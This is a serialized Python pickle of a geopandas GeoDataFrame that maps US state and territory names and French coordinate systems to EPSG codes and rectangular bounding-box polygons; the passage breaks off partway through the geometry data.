b'\x80\x03cgeopandas.geodataframe\nGeoDataFrame\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00_dataq\x03cpandas.core.internals.managers\nBlockManager\nq\x04)\x81q\x05(]q\x06(cpandas.core.indexes.base\n_new_Index\nq\x07cpandas.core.indexes.base\nIndex\nq\x08}q\t(X\x04\x00\x00\x00dataq\ncnumpy.core.multiarray\n_reconstruct\nq\x0bcnumpy\nndarray\nq\x0cK\x00\x85q\rC\x01bq\x0e\x87q\x0fRq\x10(K\x01K\x03\x85q\x11cnumpy\ndtype\nq\x12X\x02\x00\x00\x00O8q\x13K\x00K\x01\x87q\x14Rq\x15(K\x03X\x01\x00\x00\x00|q\x16NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK?tq\x17b\x89]q\x18(X\x04\x00\x00\x00nameq\x19X\x04\x00\x00\x00epsgq\x1aX\x08\x00\x00\x00geometryq\x1betq\x1cbX\x04\x00\x00\x00nameq\x1dNu\x86q\x1eRq\x1fh\x07cpandas.core.indexes.range\nRangeIndex\nq }q!(h\x1dNX\x05\x00\x00\x00startq"K\x00X\x04\x00\x00\x00stopq#K\xa9X\x04\x00\x00\x00stepq$K\x01u\x86q%Rq&e]q\'(h\x0bh\x0cK\x00\x85q(h\x0e\x87q)Rq*(K\x01K\x02K\xa9\x86q+h\x15\x89]q,(X\x07\x00\x00\x00Montanaq-X\r\x00\x00\x00West Virginiaq.h.X\x0c\x00\x00\x00Pennsylvaniaq/h/X\x05\x00\x00\x00Texasq0h0h0h0h0X\x0e\x00\x00\x00South Carolinaq1X\x07\x00\x00\x00Vermontq2X\x0e\x00\x00\x00American Samoaq3X\x04\x00\x00\x00Utahq4h4h4X\x04\x00\x00\x00Guamq5X\x18\x00\x00\x00Northern Mariana Islandsq6X\n\x00\x00\x00Washingtonq7h7X\x06\x00\x00\x00Alaskaq8X\r\x00\x00\x00Massachusettsq9h9X\x08\x00\x00\x00Michiganq:h:h:X\x07\x00\x00\x00Alabamaq;h;X\n\x00\x00\x00Californiaq<X\x08\x00\x00\x00Kentuckyq=X\x07\x00\x00\x00Arizonaq>h>h>X\x08\x00\x00\x00Arkansasq?h?X\x0c\x00\x00\x00South Dakotaq@h@X\t\x00\x00\x00TennesseeqAX\x08\x00\x00\x00ColoradoqBhBhBX\x0b\x00\x00\x00ConnecticutqCX\x0b\x00\x00\x00MississippiqDhDX\x08\x00\x00\x00MissouriqEhEhEX\x08\x00\x00\x00OklahomaqFhFX\x06\x00\x00\x00OregonqGX\x08\x00\x00\x00VirginiaqHhHX\x08\x00\x00\x00MarylandqIX\x07\x00\x00\x00WyomingqJhJhJhJX\x04\x00\x00\x00OhioqKhKX\t\x00\x00\x00MinnesotaqLhLhLX\x0b\x00\x00\x00Puerto RicoqMX\x06\x00\x00\x00KansasqNhNX\x0c\x00\x00\x00North DakotaqOhOX\x13\x00\x00\x00U.S. 
Virgin IslandsqPX\x14\x00\x00\x00District of ColumbiaqQX\x08\x00\x00\x00DelawareqRX\x07\x00\x00\x00GeorgiaqShSX\x07\x00\x00\x00FloridaqThThTX\x06\x00\x00\x00HawaiiqUhUhUhUhUX\t\x00\x00\x00LouisianaqVhVX\x08\x00\x00\x00IllinoisqWhWX\x05\x00\x00\x00IdahoqXhXhXX\x04\x00\x00\x00IowaqYhYX\x07\x00\x00\x00IndianaqZhZX\x08\x00\x00\x00Nebraskaq[X\x05\x00\x00\x00Maineq\\h\\X\x0e\x00\x00\x00North Carolinaq]X\x08\x00\x00\x00New Yorkq^h^h^h^X\n\x00\x00\x00New Mexicoq_h_h_X\n\x00\x00\x00New Jerseyq`X\r\x00\x00\x00New HampshireqaX\t\x00\x00\x00WisconsinqbhbhbX\x06\x00\x00\x00NevadaqchchcX\x0c\x00\x00\x00Rhode IslandqdX\x0c\x00\x00\x00RGF93 / CC42qeX\x0c\x00\x00\x00RGF93 / CC43qfX\x0c\x00\x00\x00RGF93 / CC44qgX\x0c\x00\x00\x00RGF93 / CC45qhX\x0c\x00\x00\x00RGF93 / CC46qiX\x0c\x00\x00\x00RGF93 / CC47qjX\x0c\x00\x00\x00RGF93 / CC48qkX\x0c\x00\x00\x00RGF93 / CC49qlX\x0c\x00\x00\x00RGF93 / CC50qmX\x15\x00\x00\x00RGAF09 / UTM zone 20NqnX\x15\x00\x00\x00RGFG95 / UTM zone 22NqoX\x14\x00\x00\x00RGR92 / UTM zone 40SqpX\x16\x00\x00\x00RGSPM06 / UTM zone 21NqqX\x14\x00\x00\x00RGM04 / UTM zone 
38SqrX\x06\x00\x00\x00europeqshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshsX\x04\x00\x00\x003604qtX\x04\x00\x00\x003693quX\x04\x00\x00\x003694qvX\x04\x00\x00\x003649qwX\x04\x00\x00\x003651qxX\x04\x00\x00\x003673qyX\x04\x00\x00\x003671qzX\x04\x00\x00\x003669q{X\x04\x00\x00\x003667q|X\x04\x00\x00\x003663q}X\x04\x00\x00\x003655q~X\x04\x00\x00\x003684q\x7fX\x04\x00\x00\x002195q\x80X\x04\x00\x00\x003681q\x81X\x04\x00\x00\x003678q\x82X\x04\x00\x00\x003675q\x83X\x04\x00\x00\x006323q\x84h\x84X\x04\x00\x00\x003691q\x85X\x04\x00\x00\x003689q\x86X\x04\x00\x00\x003467q\x87X\x04\x00\x00\x003583q\x88X\x04\x00\x00\x003585q\x89X\x04\x00\x00\x003587q\x8aX\x04\x00\x00\x003589q\x8bX\x04\x00\x00\x003592q\x8cX\x04\x00\x00\x003466q\x8dX\x04\x00\x00\x003465q\x8eX\x04\x00\x00\x003488q\x8fX\x04\x00\x00\x003546q\x90X\x04\x00\x00\x003478q\x91X\x04\x00\x00\x003480q\x92X\x04\x00\x00\x003482q\x93X\x04\x00\x00\x003484q\x94X\x04\x00\x00\x003486q\x95X\x04\x00\x00\x003657q\x96X\x04\x00\x00\x003659q\x97X\x04\x00\x00\x003661q\x98X\x04\x00\x00\x003505q\x99X\x04\x00\x00\x003503q\x9aX\x04\x00\x00\x003501q\x9bX\x04\x00\x00\x003507q\x9cX\x04\x00\x00\x003597q\x9dX\x04\x00\x00\x003599q\x9eX\x04\x00\x00\x003601q\x9fX\x04\x00\x00\x003602q\xa0X\x04\x00\x00\x003603q\xa1X\x04\x00\x00\x003641q\xa2X\x04\x00\x00\x003639q\xa3X\x04\x00\x00\x003643q\xa4X\x04\x00\x00\x003685q\xa5X\x04\x00\x00\x003687q\xa6X\x04\x00\x00\x003559q\xa7X\x04\x00\x00\x003702q\xa8X\x04\x00\x00\x003703q\xa9X\x04\x00\x00\x003704q\xaaX\x04\x00\x00\x003705q\xabX\x04\x00\x00\x003637q\xacX\x04\x00\x00\x003638q\xadX\x04\x00\x00\x003596q\xaeX\x04\x00\x00\x003595q\xafX\x04\x00\x00\x003594q\xb0X\x04\x00\x00\x004437q\xb1X\x04\x00\x00\x003540q\xb2X\x04\x00\x00\x003542q\xb3X\x04\x00\x00\x003633q\xb4X\x04\x00\x00\x003635q\xb5h\xb1h\xa7X\x04\x00\x00\x003509q\xb6X\x04\x00\x00\x003518q\xb7X\x04\x00\x00\x003520q\xb8X\x04\x00\x00\x003511q\xb9X\x04\x00\x00\x003514q\xbaX\x04\x00\x00\x003516q\xbbX\x05\x00\x00\x0026961q\xbcX\x
05\x00\x00\x0026962q\xbdX\x05\x00\x00\x0026963q\xbeX\x05\x00\x00\x0026964q\xbfX\x05\x00\x00\x0026965q\xc0X\x04\x00\x00\x003550q\xc1X\x04\x00\x00\x003552q\xc2X\x04\x00\x00\x003530q\xc3X\x04\x00\x00\x003528q\xc4X\x04\x00\x00\x003526q\xc5X\x04\x00\x00\x003524q\xc6X\x04\x00\x00\x003522q\xc7X\x04\x00\x00\x003538q\xc8X\x04\x00\x00\x003536q\xc9X\x04\x00\x00\x003534q\xcaX\x04\x00\x00\x003532q\xcbX\x04\x00\x00\x003606q\xccX\x04\x00\x00\x003558q\xcdX\x04\x00\x00\x003557q\xceX\x04\x00\x00\x003631q\xcfX\x04\x00\x00\x003629q\xd0X\x04\x00\x00\x003627q\xd1X\x04\x00\x00\x003625q\xd2X\x04\x00\x00\x003623q\xd3X\x04\x00\x00\x003617q\xd4X\x04\x00\x00\x003619q\xd5X\x04\x00\x00\x003621q\xd6X\x04\x00\x00\x003615q\xd7X\x04\x00\x00\x003613q\xd8X\x04\x00\x00\x003695q\xd9X\x04\x00\x00\x003697q\xdaX\x04\x00\x00\x003699q\xdbX\x04\x00\x00\x003607q\xdcX\x04\x00\x00\x003609q\xddX\x04\x00\x00\x003611q\xdeX\x04\x00\x00\x003653q\xdfX\x04\x00\x00\x003942q\xe0X\x04\x00\x00\x003943q\xe1X\x04\x00\x00\x003944q\xe2X\x04\x00\x00\x003945q\xe3X\x04\x00\x00\x003946q\xe4X\x04\x00\x00\x003947q\xe5X\x04\x00\x00\x003948q\xe6X\x04\x00\x00\x003949q\xe7X\x04\x00\x00\x003950q\xe8X\x04\x00\x00\x005490q\xe9X\x04\x00\x00\x002972q\xeaX\x04\x00\x00\x002975q\xebX\x04\x00\x00\x004467q\xecX\x04\x00\x00\x004471q\xedX\x04\x00\x00\x003035q\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeetq\xefbcgeopandas.array\nGeometryArray\nq\xf0)\x81q\xf1}q\xf2h\nh\x0bh\x0cK\x00\x85q\xf3h\x0e\x87q\xf4Rq\xf5(K\x01K\xa9\x85q\xf6h\x15\x89]q\xf7(cshapely.geometry.polygon\nPolygon\nq\xf8)Rq\xf9C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\r\x00\x00@3\x03]\xc0\x00\x00\x00`$\x80H@!\x00\x00 \x88\x02Z\xc0\x00\x00\x00`$\x80H@!\x00\x00 
\x88\x02Z\xc0\xfe\xff\xff\x1f\xda-F@\r\x00\x00@3\x03]\xc0\xfe\xff\xff\x1f\xda-F@\r\x00\x00@3\x03]\xc0\x00\x00\x00`$\x80H@q\xfabh\xf8)Rq\xfbC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00q=\n\xd7\xa3pT\xc0q=\n\xd7\xa3PD@\x1f\x85\xebQ\xb8nS\xc0q=\n\xd7\xa3PD@\x1f\x85\xebQ\xb8nS\xc0\x00\x00\x00\x00\x00`C@q=\n\xd7\xa3pT\xc0\x00\x00\x00\x00\x00`C@q=\n\xd7\xa3pT\xc0q=\n\xd7\xa3PD@q\xfcbh\xf8)Rq\xfdC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x9a\x99\x99\x99\x99\xa9T\xc0\xd7\xa3p=\n\x97C@33333\xc3S\xc0\xd7\xa3p=\n\x97C@33333\xc3S\xc0\x9a\x99\x99\x99\x99\x99B@\x9a\x99\x99\x99\x99\xa9T\xc0\x9a\x99\x99\x99\x99\x99B@\x9a\x99\x99\x99\x99\xa9T\xc0\xd7\xa3p=\n\x97C@q\xfebh\xf8)Rq\xffC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe1z\x14\xaeG!T\xc0\xe1z\x14\xaeGAE@\\\x8f\xc2\xf5(\xacR\xc0\xe1z\x14\xaeGAE@\\\x8f\xc2\xf5(\xacR\xc0\xcd\xcc\xcc\xcc\xccLD@\xe1z\x14\xaeG!T\xc0\xcd\xcc\xcc\xcc\xccLD@\xe1z\x14\xaeG!T\xc0\xe1z\x14\xaeGAE@r\x00\x01\x00\x00bh\xf8)Rr\x01\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe1z\x14\xaeG!T\xc0\xd7\xa3p=\n\x97D@\xaeG\xe1z\x14\xaeR\xc0\xd7\xa3p=\n\x97D@\xaeG\xe1z\x14\xaeR\xc0{\x14\xaeG\xe1\xdaC@\xe1z\x14\xaeG!T\xc0{\x14\xaeG\xe1\xdaC@\xe1z\x14\xaeG!T\xc0\xd7\xa3p=\n\x97D@r\x02\x01\x00\x00bh\xf8)Rr\x03\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00@Z\xc0)\\\x8f\xc2\xf5\xa8>@\x85\xebQ\xb8\x1euW\xc0)\\\x8f\xc2\xf5\xa8>@\x85\xebQ\xb8\x1euW\xc0R\xb8\x1e\x85\xeb\xd1;@\x00\x00\x00\x00\x00@Z\xc0R\xb8\x1e\x85\xeb\xd1;@\x00\x00\x00\x00\x00@Z\xc0)\\\x8f\xc2\xf5\xa8>@r\x04\x01\x00\x00bh\xf8)Rr\x05\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xcd\xcc\xcc\xcc\xcc\x0cY\xc0333333<@H\xe1z\x14\xaeGX\xc0333333<@H\xe1z\x14\xaeGX\xc0\x14\xaeG\xe1z\xd49@\xcd\xcc\xcc\xcc\xcc\x0cY\xc0\x14\xaeG\xe1z\xd49@\xcd\xcc\xcc\xcc\xcc\x0cY\xc0333333<@r\x06\x01\x00\x00bh\xf8)Rr\x07\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\xc3Y\xc0\n\xd7\xa3p=JA@\x00\x00\
x00\x00\x00\x80W\xc0\n\xd7\xa3p=JA@\x00\x00\x00\x00\x00\x80W\xc0=\n\xd7\xa3p\xbd?@33333\xc3Y\xc0=\n\xd7\xa3p\xbd?@33333\xc3Y\xc0\n\xd7\xa3p=JA@r\x08\x01\x00\x00bh\xf8)Rr\t\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\xc3Y\xc0\x00\x00\x00\x00\x00@B@\x00\x00\x00\x00\x00\x00Y\xc0\x00\x00\x00\x00\x00@B@\x00\x00\x00\x00\x00\x00Y\xc0H\xe1z\x14\xae\'A@33333\xc3Y\xc0H\xe1z\x14\xae\'A@33333\xc3Y\xc0\x00\x00\x00\x00\x00@B@r\n\x01\x00\x00bh\xf8)Rr\x0b\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb8\x1e\x85\xebQ\xa8Z\xc0\xe1z\x14\xaeG!@@q=\n\xd7\xa3`W\xc0\xe1z\x14\xaeG!@@q=\n\xd7\xa3`W\xc0H\xe1z\x14\xae\xc7=@\xb8\x1e\x85\xebQ\xa8Z\xc0H\xe1z\x14\xae\xc7=@\xb8\x1e\x85\xebQ\xa8Z\xc0\xe1z\x14\xaeG!@@r\x0c\x01\x00\x00bh\xf8)Rr\r\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xa8\xd6T\xc0\xff\xff\xff\xdf\x96\x9bA@\xfe\xff\xff\x7f\xf4\x9fS\xc0\xff\xff\xff\xdf\x96\x9bA@\xfe\xff\xff\x7f\xf4\x9fS\xc0\xfb\xff\xff\x7fC\x04@@\x00\x00\x00\x00\xa8\xd6T\xc0\xfb\xff\xff\x7fC\x04@@\x00\x00\x00\x00\xa8\xd6T\xc0\xff\xff\xff\xdf\x96\x9bA@r\x0e\x01\x00\x00bh\xf8)Rr\x0f\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x04\\R\xc0\xfe\xff\xff\x1f"\x82F@\x00\x00\x00`\xc8\xddQ\xc0\xfe\xff\xff\x1f"\x82F@\x00\x00\x00`\xc8\xddQ\xc0\x05\x00\x00 \x0c]E@\x00\x00\x00\x00\x04\\R\xc0\x05\x00\x00 
\x0c]E@\x00\x00\x00\x00\x04\\R\xc0\xfe\xff\xff\x1f"\x82F@r\x10\x01\x00\x00bh\xf8)Rr\x11\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x9c\x82\xa1\xb3qie\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0\x84\xdc\xa0Q\xd5\xfdd\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0\x84\xdc\xa0Q\xd5\xfdd\xc0\x83@\x1dE\x8c\x85-\xc0\x9c\x82\xa1\xb3qie\xc0\x83@\x1dE\x8c\x85-\xc0\x9c\x82\xa1\xb3qie\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0r\x12\x01\x00\x00bh\xf8)Rr\x13\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\n\xd7\xa3p=JC@33333C[\xc0\n\xd7\xa3p=JC@33333C[\xc0\x00\x00\x00\x00\x00\x80B@33333\x83\\\xc0\x00\x00\x00\x00\x00\x80B@33333\x83\\\xc0\n\xd7\xa3p=JC@r\x14\x01\x00\x00bh\xf8)Rr\x15\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\x00\x00\x00\x00\x00\x00E@33333C[\xc0\x00\x00\x00\x00\x00\x00E@33333C[\xc0fffffFD@33333\x83\\\xc0fffffFD@33333\x83\\\xc0\x00\x00\x00\x00\x00\x00E@r\x16\x01\x00\x00bh\xf8)Rr\x17\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\n\xd7\xa3p=\x8aD@33333C[\xc0\n\xd7\xa3p=\x8aD@33333C[\xc0\x00\x00\x00\x00\x00@C@33333\x83\\\xc0\x00\x00\x00\x00\x00@C@33333\x83\\\xc0\n\xd7\xa3p=\x8aD@r\x18\x01\x00\x00bh\xf8)Rr\x19\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xeav\xf6\x95\x07\x12b@u><K\x90i+@z\xa6\x97\x18K b@u><K\x90i+@z\xa6\x97\x18K b@\x13\xd5[\x03[]*@\xeav\xf6\x95\x07\x12b@\x13\xd5[\x03[]*@\xeav\xf6\x95\x07\x12b@u><K\x90i+@r\x1a\x01\x00\x00bh\xf8)Rr\x1b\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x02\xd3i\xdd\x06\x1ab@\x0f\'0\x9d\xd6\x9d4@=}\x04\xfe\xf0Db@\x0f\'0\x9d\xd6\x9d4@=}\x04\xfe\xf0Db@B[\xce\xa5\xb8\x12,@\x02\xd3i\xdd\x06\x1ab@B[\xce\xa5\xb8\x12,@\x02\xd3i\xdd\x06\x1ab@\x0f\'0\x9d\xd6\x9d4@r\x1c\x01\x00\x00bh\xf8)Rr\x1d\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00 
_\xc0\xcd\xcc\xcc\xcc\xcc\xccG@\x9a\x99\x99\x99\x999]\xc0\xcd\xcc\xcc\xcc\xcc\xccG@\x9a\x99\x99\x99\x999]\xc0fffff\xc6F@\x00\x00\x00\x00\x00 _\xc0fffff\xc6F@\x00\x00\x00\x00\x00 _\xc0\xcd\xcc\xcc\xcc\xcc\xccG@r\x1e\x01\x00\x00bh\xf8)Rr\x1f\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x000_\xc0\x00\x00\x00\x00\x00\x80H@R\xb8\x1e\x85\xebA]\xc0\x00\x00\x00\x00\x00\x80H@R\xb8\x1e\x85\xebA]\xc0\n\xd7\xa3p=\x8aG@\x00\x00\x00\x00\x000_\xc0\n\xd7\xa3p=\x8aG@\x00\x00\x00\x00\x000_\xc0\x00\x00\x00\x00\x00\x80H@r \x01\x00\x00bh\xf8)Rr!\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe2X\x17\xb7\xd1df\xc0\x02\x00\x00\x80\xb5\xe6Q@\xd3Mb\x10X?`\xc0\x02\x00\x00\x80\xb5\xe6Q@\xd3Mb\x10X?`\xc0\xfd\xff\xff_\xed\x82I@\xe2X\x17\xb7\xd1df\xc0\xfd\xff\xff_\xed\x82I@\xe2X\x17\xb7\xd1df\xc0\x02\x00\x00\x80\xb5\xe6Q@r"\x01\x00\x00bh\xf8)Rr#\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00H\xe1z\x14\xae\xb7Q\xc0\xe1z\x14\xaeG\xc1D@\x9a\x99\x99\x99\x99yQ\xc0\xe1z\x14\xaeG\xc1D@\x9a\x99\x99\x99\x99yQ\xc0\x9a\x99\x99\x99\x99\x99D@H\xe1z\x14\xae\xb7Q\xc0\x9a\x99\x99\x99\x99\x99D@H\xe1z\x14\xae\xb7Q\xc0\xe1z\x14\xaeG\xc1D@r$\x01\x00\x00bh\xf8)Rr%\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00q=\n\xd7\xa3`R\xc0R\xb8\x1e\x85\xebqE@\xd7\xa3p=\nwQ\xc0R\xb8\x1e\x85\xebqE@\xd7\xa3p=\nwQ\xc0\xcd\xcc\xcc\xcc\xcc\xacD@q=\n\xd7\xa3`R\xc0\xcd\xcc\xcc\xcc\xcc\xacD@q=\n\xd7\xa3`R\xc0R\xb8\x1e\x85\xebqE@r&\x01\x00\x00bh\xf8)Rr\'\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xf6(\\\x8f\xc2\xc5U\xc0q=\n\xd7\xa3\xf0F@\x8f\xc2\xf5(\\\x8fT\xc0q=\n\xd7\xa3\xf0F@\x8f\xc2\xf5(\\\x8fT\xc0H\xe1z\x14\xae\xe7E@\xf6(\\\x8f\xc2\xc5U\xc0H\xe1z\x14\xae\xe7E@\xf6(\\\x8f\xc2\xc5U\xc0q=\n\xd7\xa3\xf0F@r(\x01\x00\x00bh\xf8)Rr)\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\n\xd7\xa3p=\x9aV\xc0fffff&H@{\x14\xaeG\xe1\xdaT\xc0fffff&H@{\x14\xaeG\xe1\xdaT\xc0\x1f\x85\xebQ\xb8\x9eF@\n\xd7\xa3p=\x9aV\xc0\x1
f\x85\xebQ\xb8\x9eF@\n\xd7\xa3p=\x9aV\xc0fffff&H@r*\x01\x00\x00bh\xf8)Rr+\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00)\\\x8f\xc2\xf5\xc8U\xc0\xf6(\\\x8f\xc2\x15F@H\xe1z\x14\xae\x87T\xc0\xf6(\\\x8f\xc2\x15F@H\xe1z\x14\xae\x87T\xc0\x00\x00\x00\x00\x00\xe0D@)\\\x8f\xc2\xf5\xc8U\xc0\x00\x00\x00\x00\x00\xe0D@)\\\x8f\xc2\xf5\xc8U\xc0\xf6(\\\x8f\xc2\x15F@r,\x01\x00\x00bh\xf8)Rr-\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x1f\x85\xebQ\xb8\x1eV\xc0\x00\x00\x00\x00\x00\x80A@33333\x93U\xc0\x00\x00\x00\x00\x00\x80A@33333\x93U\xc0333333>@\x1f\x85\xebQ\xb8\x1eV\xc0333333>@\x1f\x85\xebQ\xb8\x1eV\xc0\x00\x00\x00\x00\x00\x80A@r.\x01\x00\x00bh\xf8)Rr/\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x80A@)\\\x8f\xc2\xf58U\xc0\x00\x00\x00\x00\x00\x80A@)\\\x8f\xc2\xf58U\xc0\x00\x00\x00\x00\x00\x00?@\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x00?@\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x80A@r0\x01\x00\x00bh\xf8)Rr1\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`7\x01E@\xf5\xff\xff\x9f^\x88\\\xc0\x04\x00\x00`7\x01E@\xf5\xff\xff\x9f^\x88\\\xc0\x04\x00\x00`\xc7C@@\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`\xc7C@@\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`7\x01E@r2\x01\x00\x00bh\xf8)Rr3\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00\x00\xe0\x92C@\x04\x00\x00\x00\xbb}T\xc0\x00\x00\x00\x00\xe0\x92C@\x04\x00\x00\x00\xbb}T\xc0\x00\x00\x00`\x94?B@\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00`\x94?B@\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00\x00\xe0\x92C@r4\x01\x00\x00bh\xf8)Rr5\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x85\xebQ\xb8\x1eU\\\xc0\x00\x00\x00\x00\x00\x80B@\xcd\xcc\xcc\xcc\xcc\x9c[\xc0\x00\x00\x00\x00\x00\x80B@\xcd\xcc\xcc\xcc\xcc\x9c[\xc0\x14\xaeG\xe1zT?@\x85\xebQ\xb8\x1eU\\\xc0\x14\xaeG\xe1zT?@\x85\xebQ\xb8\x1eU\\\xc0\x00\x00\x00\x00\x00\x80B@r6\x01\x00\x
00bh\xf8)Rr7\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xaeG\xe1z\x14\xee[\xc0\x00\x00\x00\x00\x00\x80B@33333C[\xc0\x00\x00\x00\x00\x00\x80B@33333C[\xc0\x14\xaeG\xe1zT?@\xaeG\xe1z\x14\xee[\xc0\x14\xaeG\xe1zT?@\xaeG\xe1z\x14\xee[\xc0\x00\x00\x00\x00\x00\x80B@r8\x01\x00\x00bh\xf8)Rr9\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xb0\\\xc0\x00\x00\x00\x00\x00\x80B@\xe1z\x14\xaeG!\\\xc0\x00\x00\x00\x00\x00\x80B@\xe1z\x14\xaeG!\\\xc0\x85\xebQ\xb8\x1e\x05@@\x00\x00\x00\x00\x00\xb0\\\xc0\x85\xebQ\xb8\x1e\x05@@\x00\x00\x00\x00\x00\xb0\\\xc0\x00\x00\x00\x00\x00\x80B@r:\x01\x00\x00bh\xf8)Rr;\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb8\x1e\x85\xebQ\xa8W\xc0\x1f\x85\xebQ\xb8>B@\x9a\x99\x99\x99\x99iV\xc0\x1f\x85\xebQ\xb8>B@\x9a\x99\x99\x99\x99iV\xc0\x14\xaeG\xe1zTA@\xb8\x1e\x85\xebQ\xa8W\xc0\x14\xaeG\xe1zTA@\xb8\x1e\x85\xebQ\xa8W\xc0\x1f\x85\xebQ\xb8>B@r<\x01\x00\x00bh\xf8)Rr=\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x8f\xc2\xf5(\\\x9fW\xc0\xecQ\xb8\x1e\x85\x8bA@\xa4p=\n\xd7\x83V\xc0\xecQ\xb8\x1e\x85\x8bA@\xa4p=\n\xd7\x83V\xc0\x00\x00\x00\x00\x00\x80@@\x8f\xc2\xf5(\\\x9fW\xc0\x00\x00\x00\x00\x00\x80@@\x8f\xc2\xf5(\\\x9fW\xc0\xecQ\xb8\x1e\x85\x8bA@r>\x01\x00\x00bh\xf8)Rr?\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x14\xaeG\xe1z\x04Z\xc0\xb8\x1e\x85\xebQ\xf8F@=\n\xd7\xa3p\x1dX\xc0\xb8\x1e\x85\xebQ\xf8F@=\n\xd7\xa3p\x1dX\xc0R\xb8\x1e\x85\xeb\x11F@\x14\xaeG\xe1z\x04Z\xc0R\xb8\x1e\x85\xeb\x11F@\x14\xaeG\xe1z\x04Z\xc0\xb8\x1e\x85\xebQ\xf8F@r@\x01\x00\x00bh\xf8)RrA\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x14\xaeG\xe1z\x04Z\xc0\xa4p=\n\xd7cF@=\n\xd7\xa3p\x1dX\xc0\xa4p=\n\xd7cF@=\n\xd7\xa3p\x1dX\xc0\x1f\x85\xebQ\xb8>E@\x14\xaeG\xe1z\x04Z\xc0\x1f\x85\xebQ\xb8>E@\x14\xaeG\xe1z\x04Z\xc0\xa4p=\n\xd7cF@rB\x01\x00\x00bh\xf8)RrC\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xdc\x93V\xc0\xfc\xff\xff\
